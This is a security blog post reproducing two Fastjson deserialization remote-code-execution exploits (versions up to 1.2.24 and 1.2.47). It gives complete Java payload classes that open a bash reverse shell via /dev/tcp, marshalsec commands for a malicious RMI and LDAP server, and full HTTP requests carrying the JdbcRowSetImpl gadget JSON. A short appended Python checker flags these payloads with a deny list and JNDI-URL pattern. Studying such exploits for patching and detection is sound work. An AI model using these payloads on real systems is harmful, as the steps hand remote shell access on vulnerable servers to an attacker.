Fastjson

1. Vulnerability reproduction

CVE-2017-18349

Affected versions: Fastjson <= 1.2.24

Create TouchFile.java

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    // Static initializer: runs as soon as the class is loaded by the JNDI client
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/IP/PORT 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}

Generate TouchFile.class and place it in the root directory of your own web server

javac TouchFile.java

marshalsec tool: https://github.com/mbechler/marshalsec

Start the RMI service, listening on port 9999

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://your-web-server-IP:80/#TouchFile" 9999

Listen with nc first, then send the following request to receive the reverse shell

POST / HTTP/1.1
Host: 192.168.135.131:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 164

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.165.79:9999/TouchFile",
        "autoCommit":true
    }
}

1.2.47-rce

Affected versions: Fastjson <= 1.2.47

Create Exploit.java

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    // Constructor: runs when the JNDI client instantiates the fetched class
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }
    // Empty main so the class compiles as a stand-alone unit
    public static void main(String[] args) throws Exception {
    }
}

Generate Exploit.class and place it in the root directory of your own web server

javac Exploit.java

marshalsec tool: https://github.com/mbechler/marshalsec

Start the LDAP service, listening on port 9999

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-web-server-IP:80/#Exploit" 9999

Listen with nc first, then send the following request to receive the reverse shell

POST / HTTP/1.1
Host: 192.168.135.131:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 267

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.165.79:9999/Exploit",
        "autoCommit":true
    }
}
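Added example (not from the original post): a small Python checker that flags the two request bodies above the way a WAF rule or log-review script would, from the defender's side. The deny list, the finding format and the benign sample are my own assumptions; the two payload bodies are the ones shown in the post.

```python
import json
import re
from typing import Any, List

# Deny list built from the classes the two payloads above abuse (assumption for
# this example; a production list would track the public Fastjson autotype blocklist).
DENIED_TYPES = {
    "com.sun.rowset.JdbcRowSetImpl",  # dataSourceName triggers a JNDI lookup
    "java.lang.Class",                # 1.2.47 bypass: primes the class cache via "val"
}
JNDI_SCHEME = re.compile(r"^(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)

# Request bodies copied from the post above, plus one constructed benign body.
PAYLOAD_1_2_24 = ('{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                  '"dataSourceName":"rmi://192.168.165.79:9999/TouchFile","autoCommit":true}}')
PAYLOAD_1_2_47 = ('{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                  '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                  '"dataSourceName":"ldap://192.168.165.79:9999/Exploit","autoCommit":true}}')
BENIGN = '{"user":{"name":"alice","roles":["admin"]}}'


def scan_value(value: Any, path: str, findings: List[str]) -> None:
    """Walk parsed JSON and record every autotype marker and JNDI-style URL."""
    if isinstance(value, dict):
        type_name = value.get("@type")
        if isinstance(type_name, str):
            verdict = "deny-listed" if type_name in DENIED_TYPES else "not deny-listed"
            findings.append(f"{path}: @type={type_name} ({verdict})")
        # The 1.2.47 shape: {"@type":"java.lang.Class","val":"<gadget>"} loads <gadget>
        # into Fastjson's type cache so a later @type skips the autotype check.
        val = value.get("val")
        if type_name == "java.lang.Class" and isinstance(val, str) and val in DENIED_TYPES:
            findings.append(f"{path}: class-cache priming of {val}")
        for key, child in value.items():
            if isinstance(child, str) and JNDI_SCHEME.match(child):
                findings.append(f"{path}.{key}: JNDI reference {child}")
            scan_value(child, f"{path}.{key}", findings)
    elif isinstance(value, list):
        for i, child in enumerate(value):
            scan_value(child, f"{path}[{i}]", findings)


def scan_body(body: str) -> List[str]:
    """Return findings for one JSON request body; an empty list means nothing flagged."""
    try:
        doc = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    findings: List[str] = []
    scan_value(doc, "$", findings)
    return findings
```

Any `@type` key in untrusted input is worth logging for a Fastjson application; the deny-list match and the class-cache priming pattern are the two that warrant blocking.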
posted @ 2023-01-17 16:47  Hacker&Cat